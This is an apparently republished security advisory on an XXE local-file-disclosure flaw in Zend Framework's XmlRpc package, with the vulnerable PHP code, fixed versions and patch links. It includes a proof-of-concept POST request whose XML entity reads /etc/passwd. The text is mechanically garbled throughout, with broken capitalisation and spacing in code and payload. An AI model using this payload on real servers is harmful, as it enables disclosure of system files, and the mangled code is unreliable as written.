Title: Local file disclosure via XXE injection
Affected products: Zend Framework
Affected versions: 1.11.11 1.12.0 RC1 2.0.0 beta4 and earlier versions/branches
Revised version: 1.11.12 1.12.0 RC2 2.0.0 beta5/trunk
Discoverer: K. Gudinavicius SEC Consult Vulnerability Lab
Developer introduction:
-------------------
"Extending the art & spirit of PHP, Zend Framework is based on simplicity,
Object-oriented best practices, effecate friendly licensing, and a rigorously
Tested agile codebase. Zend Framework is focused on building more secure,
Reliable, and modern Web 2.0 applications & web services, and consuming widely
Available APIs from leading vendors like Google, Amazon, Yahoo !, Flickr,
Well as API providers and cataloguers like StrikeIron and ProgrammableWeb ."
From: http://framework.zend.com/about/overview
Defect Overview:
-----------------------------------
The XmlRpc package of Zend Framework is vulnerable to XML eXternal Entity
Injection attacks (both server and client). The SimpleXMLElement class
(SimpleXML PHP extension) is used in an insecure way to parse XML data.
External entities can be specified by adding a specific DOCTYPE element
XML-RPC requests. By exploiting this vulnerability an application may be
Coerced to open arbitrary files and/or TCP connections.
Other software that uses the XmlRpc package of Zend Framework is then also
Vulnerable to XML eXternal Entity Injection attacks!
Proof Test:
-----------------
For example, the loadXml function (Zend \ XmlRpc \ Request. php and Response. php)
Fails to disable external entities when parsing XML data. There is no call
The libxml_disable_entity_loader function before initializing
SimpleXMLElement class. Related code excerpt: www.2cto.com
Public function loadXml ($ request)
{
If (! Is_string ($ request )){
$ This-> _ fault = new Zend_XmlRpc_Fault (635 );
$ This-> _ fault-> setEncoding ($ this-> getEncoding ());
Return false;
}
Try {
$ Xml = new SimpleXMLElement ($ request );
} Catch (Exception $ e ){
// Not valid XML
$ This-> _ fault = new Zend_XmlRpc_Fault (631 );
$ This-> _ fault-> setEncoding ($ this-> getEncoding ());
Return false;
}
[...]
}
If a web application uses the Zend_XmlRpc_Server () class
(Zend \ XmlRpc \ Server. php) to handle XML-RPC requests, it is possible
Disclose arbitrary local files from the remote system. The following HTTP POST
Request to the vulnerable XmlRpc server application specified strates
Exploitation of this vulnerability.
POST/xmlrpc_server.php HTTP/1.1
Host: $ host
<? Xml version = "1.0"?>
<! DOCTYPE foo [
<! ELEMENT methodName ANY>
<! ENTITY xxe SYSTEM "file: // etc/passwd">]>
<MethodCall>
<MethodName> & xxe; </methodName>
</MethodCall>
Solution:
---------
Upgrade to the latest version, such.
* V1.11.12
* V1.12.0 RC2
* Update ZF2 master trunk
If you are using an older branch you are urged to upgrade!
Zend framework security advisory:
Http://framework.zend.com/security/advisory/ZF2012-01
Download link for new releases:
Http://framework.zend.com/download/latest
Commits:
--------
Http://framework.zend.com/code/log.php? Repname = Zend + Framework & path = % 2F
* Zend Framework 1.X
Trunk:
Http://framework.zend.com/code/revision.php? Repname = Zend + Framework & path = % 2 Ftrunk & rev = 24970 & peg = 24970
Http://framework.zend.com/code/revision.php? Repname = Zend + Framework & path = % 2F & rev = 24975
* 1.11.X:
Http://framework.zend.com/code/revision.php? Repname = Zend + Framework & path = % 2 Fbranches % 2F & rev = 24971 & peg = 24971
Http://framework.zend.com/code/revision.php? Repname = Zend + Framework & path = % 2 Fbranches % 2F & rev = 24972 & peg = 24972
Http://framework.zend.com/code/revision.php? Repname = Zend + Framework & path = % 2F & rev = 24976
* 1.12.0:
Http://framework.zend.com/code/revision.php? Repname = Zend + Framework & path = % 2 Fbranches % 2F & rev = 24973 & peg = 24973
Http://framework.zend.com/code/revision.php? Repname = Zend + Framework & path = % 2F & rev = 24977
* Zend Framework 2.0
Https://github.com/zendframework/zf2/pull/1523